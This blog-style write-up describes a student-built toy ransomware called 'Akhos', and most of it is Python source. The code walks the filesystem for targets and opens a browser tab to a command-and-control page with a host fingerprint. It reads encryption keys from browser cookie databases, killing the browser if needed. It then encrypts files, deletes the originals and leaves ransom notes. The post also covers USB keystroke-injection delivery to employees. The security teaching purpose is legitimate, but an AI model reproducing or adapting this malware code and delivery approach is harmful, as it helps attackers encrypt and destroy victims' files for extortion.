Akhos is the name given to a toy ransomware that I built for a Cyber Security module during my undergraduate degree. The word comes from the Ancient Greek ἄχος, and means to be upset or afraid, which is what most people feel when they are dealing with this sort of malware.
Akhos consists of three parts: a Python program, compiled into an executable, that finds and encrypts the files; a Ruby application running Sinatra, backed by PostgreSQL, that provides the web-based Command and Control; and a RubberDucky that provides the delivery mechanism.
A RubberDucky is used to deliver the payload to the target organisation. For those unaware, a RubberDucky is a small device that looks like a USB flash drive but acts like a USB keyboard. It exploits the trust relationship that modern systems have with peripheral devices that are plugged in via USB. Using a special language called DuckyScript, the developer can send a sequence of keystrokes to the computer when the device is plugged in, allowing them to execute arbitrary commands. There are many ways to get the device into the hands of an employee at the target company: dead drops, mail, free hand-outs at conferences, plugging it in during office tours, etc.
This choice was inspired by a conference talk on social engineering presented at UKFast, Manchester, in 2014 by a well-known security professional: Andy Hague. During this talk he outlined an experiment in which he sent USB flash drives, each packaged in a golden box, to the Chief Financial Officer (CFO) at 500 different companies. He sent these out on a Friday evening so they would be waiting on the CFO's desk as they arrived at work the following Monday morning. Inside the golden box was an elegantly written note inviting the CFO to a company event and asking them to respond via the USB drive provided. Upon inserting the drive into their computer, a full-screen picture would appear with a message informing them of the experiment. Behind the scenes, the drive pinged his server to show him how many of the devices had been plugged in. By noon that Monday, over 350 of the 500 drives had pinged his server: a 70% success rate within 3 hours of the working week beginning.
When the RubberDucky is plugged in, the embedded firmware will automatically run a script located on the inserted microSD card, and that script is configured by the attacker to run whatever commands they need to fulfil their objectives. In this case, a binary called RSVP.exe is executed. Let's have a look at what happens when it is run:
After initial setup of logging and configuration variables, two threads are spawned to run concurrently. The first of these is the DirectoryThread. The sole purpose of this thread is to walk the filesystem and gather a list of files to encrypt.
from threading import Thread
import os
from queue import Queue
from pathlib import Path
from re import match
class DirectoryThread(Thread):
'''
This thread is responsible for locating and building a list of files that are going to
be encrypted. It recursively traverses the folders and returns a list via the queue.
'''
def __init__(self, queue: Queue, admin: bool = False):
Thread.__init__(self)
self.queue = queue
# The whitelist has been hardcoded for simplicity, but in reality the patterns are
# stored in a YAML file and loaded during startup.
self.whitelist = ['.*.akhos_target']
self.admin = admin
def run(self):
files = self.collect_filelist()
self.queue.put(files)
#abstractmethod
def collect_filelist(self):
raise NotImplementedError
@staticmethod
def directory_thread_from_os(os: str, queue: Queue, admin: bool = False):
if os == 'linux':
return LinuxDirectoryThread(queue, admin)
if os == 'windows':
return WindowsDirectoryThread(queue, admin)
class LinuxDirectoryThread(DirectoryThread):
#override
def collect_filelist(self):
directory_array = []
root = '/' if self.admin else '/home/'
for dirname, dirnames, filenames in os.walk(root):
for filename in filenames:
for pattern in self.whitelist:
if match(pattern, Path(filename).suffix):
directory_array.append(Path(dirname, filename))
return directory_array
class WindowsDirectoryThread(DirectoryThread):
#override
def collect_filelist(self):
directory_array = []
root = 'C:/' if self.admin else 'C:/Users/'
for dirname, dirnames, filenames in os.walk(root):
for filename in filenames:
for pattern in self.whitelist:
if match(pattern, Path(filename).suffix):
directory_array.append(Path(dirname, filename))
return directory_array
At the same time, another thread called BrowserThread is spawned. The purpose of this thread is to determine the name of the browser that is installed and open a page at the Command and Control URL, for example: https://command_and_control.akhos.server. It gathers some information to create an MD5 hash that can be used to uniquely identify the system, then appends the hash to the URL as the target path: https://command_and_control.akhos.server/1a79a4d60de6718e8e5b326e338ae533
import webbrowser
from threading import Thread
from hashlib import md5
from getpass import getuser
from platform import platform
from socket import gethostname
from time import time_ns
from queue import Queue
class BrowserThread(Thread):
'''
This thread is responsible for determining the initial connection to the C&C server. It first
creates an MD5 hexdigest of some system information to pass on. Second it needs to open a
webpage and pass on which application opened it.
'''
def __init__(self, queue: Queue, cc_url: str):
Thread.__init__(self)
self.queue = queue
self.cc_url = cc_url
def run(self) -> bool:
uid = self.generate_uid()
browser = self.find_usable_browser()
if not browser:
return False
browser.open_new_tab(f'{self.cc_url}/{uid}')
browser_name = self.normalise_browser_name(self.get_browser_name(browser))
if not browser_name:
return False
self.queue.put(browser_name)
return True
def generate_uid(self) -> str:
info = platform() + gethostname() + getuser() + str(time_ns())
return md5(info.encode('utf-8')).hexdigest()
def find_usable_browser(self):
for browser in self.browser_list():
try:
return webbrowser.get(browser)
except webbrowser.Error:
continue
return None
#abstractmethod
def browser_list(self) -> list:
raise NotImplementedError
#abstractmethod
def get_browser_name(self, browser) -> str:
raise NotImplementedError
def normalise_browser_name(self, browser_name: str) -> str:
if browser_name in ['google-chrome', 'chrome', 'chromium', 'chromium-browser']:
return 'chrome'
elif browser_name in ['mozilla', 'firefox']:
return 'firefox'
else:
return None
@staticmethod
def browser_thread_from_os(os, queue, cc_url):
if os == 'linux':
return LinuxBrowserThread(queue, cc_url)
if os == 'windows':
return WindowsBrowserThread(queue, cc_url)
class LinuxBrowserThread(BrowserThread):
def __init__(self, queue, cc_url):
super().__init__(queue, cc_url)
#override
def browser_list(self) -> list:
return ['firefox', 'google-chrome', 'chromium']
#override
def get_browser_name(self, browser):
return browser.basename
class WindowsBrowserThread(BrowserThread):
'''
Windows specific searching, The 'webbrowser' module has a browser type of 'windows-default',
which is likely to be chosen. It doesn't support the `basename` method, so the registry needs to
be queried to find out which browser is set to default if this option is chosen.
'''
def __init__(self, queue, cc_url):
super().__init__(queue, cc_url)
#override
def browser_list(self) -> list:
return ['firefox', 'mozilla', 'google-chrome', 'chrome', 'windows-default']
#override
def get_browser_name(self, browser) -> str:
if type(browser) == webbrowser.WindowsDefault:
from winreg import OpenKey, QueryValueEx, HKEY_CURRENT_USER
from re import search
def get_browser_name_from_registry_key(reg_path: str) -> str:
with OpenKey(HKEY_CURRENT_USER, reg_path) as key:
default = QueryValueEx(key, 'ProgId')[0].lower()
for element in self.browser_list():
if search(element, default):
return element
return None
path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice'
browser_name = get_browser_name_from_registry_key(path)
if browser_name:
return browser_name
path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice'
browser_name = get_browser_name_from_registry_key(path)
return browser_name
else:
return browser.basename
The page displayed to the user when the browser opens contains a form that resembles the one in the image to the bottom left. It is designed to keep the user distracted while the ransomware encrypts the files, and the form resets after a delay once "Submit" is clicked. The other use for this page is to deliver the encryption key to the system, which is done via an HTTP cookie. An example of this is shown on the bottom right. As you can see, the value is stored in the 'name' field. This is because cookie values are usually encrypted by the browser, but the name is not. The cookie also has a max age so that it is deleted once it expires.
Once the browser thread has returned the name of the browser and sent the user to the RSVP form, the next stage is to poll the browser cookie cache for the key. This is done in an object aptly named CookieRetriever.
import sqlite3
import glob
from time import sleep, time
from abc import abstractmethod, ABC
from os import system
class CookieRetriever(ABC):
'''
This object is responsible for retrieving the encryption key from the data store that
holds the browser cookies. It will continue until the timeout is reached, and return the
key, or None.
'''
def __init__(self, cc_url: str, os: str, timeout_sec: int):
self.cc_url = cc_url
self.os = os
self.timeout = timeout_sec
def run(self):
start_time = time()
timeout_exceeded = False
while not timeout_exceeded:
cookie = self.retrieve_cookie()
if cookie:
return cookie
sleep(5)
timeout_exceeded = (time() - self.timeout) > start_time
return None
@abstractmethod
def retrieve_cookie(self):
pass
@staticmethod
def cookie_retriever_from_browser_name(browser: str, cc_url: str, os: str, timeout_sec: int):
if browser == 'firefox':
return FirefoxSqliteCookieRetriever(cc_url, os, timeout_sec)
if browser == 'chrome':
return GoogleChromeSqliteCookieRetriever(cc_url, os, timeout_sec)
if browser == 'opera':
return OperaSqliteCookieRetriever(cc_url, os, timeout_sec)
if browser == 'edge':
return EdgeSqliteCookieRetriever(cc_url, timeout_sec)
raise NotImplementedError(f'Invalid browser name: {browser}')
class SqliteCookieRetriever(CookieRetriever):
'''
This object is responsible for connecting to the SQLite3 database that holds the browser cookies
and retrieving the encryption key. It will continue until the timeout is reached, and return
even if it cannot locate the cookie. Timers have been placed to slow down database connections,
otherwise it would eventually overwhelm with SQL queries.
'''
database_path = None
table_name = None
column_name = None
def __init__(self, cc_url: str, os: str, timeout_sec: int):
super().__init__(cc_url, os, timeout_sec)
self.connect_to_database()
def connect_to_database(self):
path = glob.glob(self.database_path[self.os])[0]
try:
self.database = sqlite3.connect(path)
self.database.execute('SELECT COUNT(*) FROM sqlite_master;')
except sqlite3.OperationalError as e:
# Databases are often locked if the browser is open and using them. Kill the browser. :)
if self.os == 'linux':
system(f'killall -9 {self.browser_name["linux"]}')
elif self.os == 'windows':
system(f'taskkill /f /im {self.browser_name["windows"]}')
self.connect_to_database()
#override
def retrieve_cookie(self):
sql = f'SELECT name FROM {self.table_name} WHERE {self.column_name}=?'
cursor = self.database.execute(sql, [self.cc_url])
key = cursor.fetchone()
if key:
key = key[0]
self.database.close()
return key
class FirefoxSqliteCookieRetriever(SqliteCookieRetriever):
database_path = {
'linux': '/home/*/.mozilla/firefox/*/cookies.sqlite',
'windows': 'C:/Users/*/AppData/Roaming/Mozilla/Firefox/Profiles/*/cookies.sqlite'
}
browser_name = {
'linux': 'firefox',
'windows': 'firefox.exe'
}
table_name = 'moz_cookies'
column_name = 'host'
def __init__(self, cc_url: str, os: str, timeout_sec: int):
super().__init__(cc_url, os, timeout_sec)
# For the sake of brevity, the other subclasses have not been included, but there is a concrete
# implementation for each supported browser.
With the key retrieved from the cookie, it must be split into its three components. This is because Akhos uses a "product cipher" for encryption. A product cipher is simply a pipeline of algorithms, where the output of one is the input to the next. Modern ciphers, such as the Advanced Encryption Standard (AES), use this approach. The following diagram depicts the flow that Akhos uses:
The three ciphers chosen for this are the Affine, transposition, and Vigenère ciphers. Each has its own restrictions on the format of the key, so three keys are needed. These are all symmetric ciphers, so the key used to encrypt a message is also used to decrypt it. To encrypt a plaintext message P with this product cipher:
P will be substituted with the Affine cipher to generate the ciphertext C1.
C1 will be permuted using the transposition cipher to generate C2.
C2 will then be substituted using the Vigenère cipher to produce the final ciphertext C3.
C = E3(E2(E1(P, Ka, Kb), K2), K3)
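To make the composition concrete, here is a minimal sketch of a three-stage product cipher over in-memory strings. It is not the Akhos implementation: the function names, the restriction to the uppercase letters A-Z, and the use of a simple column count as the transposition key are all assumptions made for illustration. It also shows one of the key restrictions mentioned above, namely that the Affine multiplier must be coprime with the alphabet size.

```python
from math import gcd
from string import ascii_uppercase as ALPHABET

M = len(ALPHABET)  # 26; this sketch only handles the letters A-Z


def affine_encrypt(text: str, a: int, b: int) -> str:
    # E1: map each letter x to (a*x + b) mod 26. `a` must be coprime with 26,
    # otherwise two letters share a ciphertext letter and decryption fails.
    if gcd(a, M) != 1:
        raise ValueError('a must be coprime with 26')
    return ''.join(ALPHABET[(a * ALPHABET.index(ch) + b) % M] for ch in text)


def affine_decrypt(text: str, a: int, b: int) -> str:
    a_inv = pow(a, -1, M)  # modular inverse (Python 3.8+)
    return ''.join(ALPHABET[(a_inv * (ALPHABET.index(ch) - b)) % M] for ch in text)


def transpose_encrypt(text: str, columns: int) -> str:
    # E2: write the text row by row into `columns` columns, read it column by column.
    return ''.join(text[c::columns] for c in range(columns))


def transpose_decrypt(text: str, columns: int) -> str:
    rows, extra = divmod(len(text), columns)
    cols, pos = [], 0
    for c in range(columns):
        length = rows + (1 if c < extra else 0)  # the first `extra` columns are longer
        cols.append(text[pos:pos + length])
        pos += length
    return ''.join(cols[i % columns][i // columns] for i in range(len(text)))


def vigenere(text: str, key: str, sign: int = 1) -> str:
    # E3: shift each letter by the matching key letter; sign=-1 reverses the shift.
    return ''.join(
        ALPHABET[(ALPHABET.index(ch) + sign * ALPHABET.index(key[i % len(key)])) % M]
        for i, ch in enumerate(text)
    )


def product_encrypt(p: str, ka: int, kb: int, k2: int, k3: str) -> str:
    # C = E3(E2(E1(P, Ka, Kb), K2), K3)
    return vigenere(transpose_encrypt(affine_encrypt(p, ka, kb), k2), k3)


def product_decrypt(c: str, ka: int, kb: int, k2: int, k3: str) -> str:
    # Undo the stages in reverse order.
    return affine_decrypt(transpose_decrypt(vigenere(c, k3, sign=-1), k2), ka, kb)


message = 'ATTACKATDAWN'
ciphertext = product_encrypt(message, 5, 8, 4, 'LEMON')
recovered = product_decrypt(ciphertext, 5, 8, 4, 'LEMON')
```

Decryption applies the inverse of each stage in the opposite order, which is why a single shared set of keys is enough for both directions. Chaining three classical ciphers does not make the result strong; each stage remains open to textbook cryptanalysis.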
At this point in the execution, the directory thread should have returned with the list of files to encrypt. Now the main loop can run, passing each file into the product cipher and writing the output to a new file.
# Prior to this is the collection of the encryption key.
# Ensure directory list is finished, then retrieve list from the queue.
directory_thread.join()
file_list = queue.get()
# A new file will be created every 10th file.
counter = 0
for file_path in file_list:
# Open file and encrypt contents.
original_file_path = Path(file_path)
ciphertext = encryptor.encrypt(keys, original_file_path.read_text())
# Hash file name and append file extension.
hashed_file_name = md5(original_file_path.name.encode('utf-8')).hexdigest() + '.0wn3d'
# Write encrypted text to file.
out_file_path = Path(original_file_path.parent, hashed_file_name)
out_file_path.write_text(ciphertext)
# Every 10 files create new random file.
counter += 1
if counter % 10 == 0:
random_file_path = Path(f'{md5(str(counter).encode("utf-8")).hexdigest()}.0wn3d')
random_file_path.write_bytes(urandom(4096))
# Add payment instruction file to each directory.
ransom_file_path = Path(original_file_path.parent, 'ransom.txt')
if not ransom_file_path.exists():
ransom_file_path.write_text(ransome_text)
# Delete old file.
remove(original_file_path)
A new file filled with random bytes is created for every 10 files encrypted. This adds a level of obfuscation to make reverse engineering efforts a little more challenging. A standard ransom note is added to each directory with a link to an onion site, payment instructions, and a warning about what happens if payment is missed.
Altogether, this makes a complete ransomware variant, although it has several obvious weaknesses. First and foremost is the use of weak and broken ciphers. In a real-world scenario, there would be no need to use anything other than AES or an equally powerful alternative, but this project was a lesson in cryptography as well as ransomware. The second, and equally obvious, flaw is that the snapshots kept by the Volume Shadow Copy Service (VSS) are left untouched. VSS is a Windows backup feature, so those snapshots could be used to restore the encrypted files.